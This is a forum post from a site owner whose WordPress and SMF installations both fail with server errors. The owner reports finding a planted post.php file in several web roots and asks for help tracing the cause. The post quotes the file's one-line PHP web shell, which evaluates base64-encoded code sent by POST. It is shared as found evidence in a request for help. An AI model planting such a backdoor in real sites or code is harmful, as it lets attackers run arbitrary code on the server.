Hello everyone!
Since Saturday that my Wordpress platform (ptfighters.com/lockdown) is giving me a "Internal Server Error". The curious thing is that my SMF platform (ptfighters.com/forum) is giving the exact same error.
I went to check my folders to see if any suspicious files were there and they were indeed. The only file to have been modified that day was a "post.php" and it was present on the public_html root, the SMF root and the Wordpress root. I removed it from those places and saved it to my HDD. This is the code it has written:
<?php if (isset($_POST["code"])) eval(base64_decode($_POST["code"])); ?>
I ran a quick search and found out that it's a malicious code that enables other code to be ran. In any case, I contacted my host and voiced my concerns and asked for instructions. They say I'm the only case they have with this problem and told me I should update my software and ensure it's all safe and sound. I'm pretty sure I was running the latest version of SMF, and 3.6 for Wordpress.
So now I'm trying to figure out what could be the source of both errors (posted in the SMF support forum also). I'm not sure if this is a SMF and/or Wordpress problem, but this is way over my head right now.
Please help!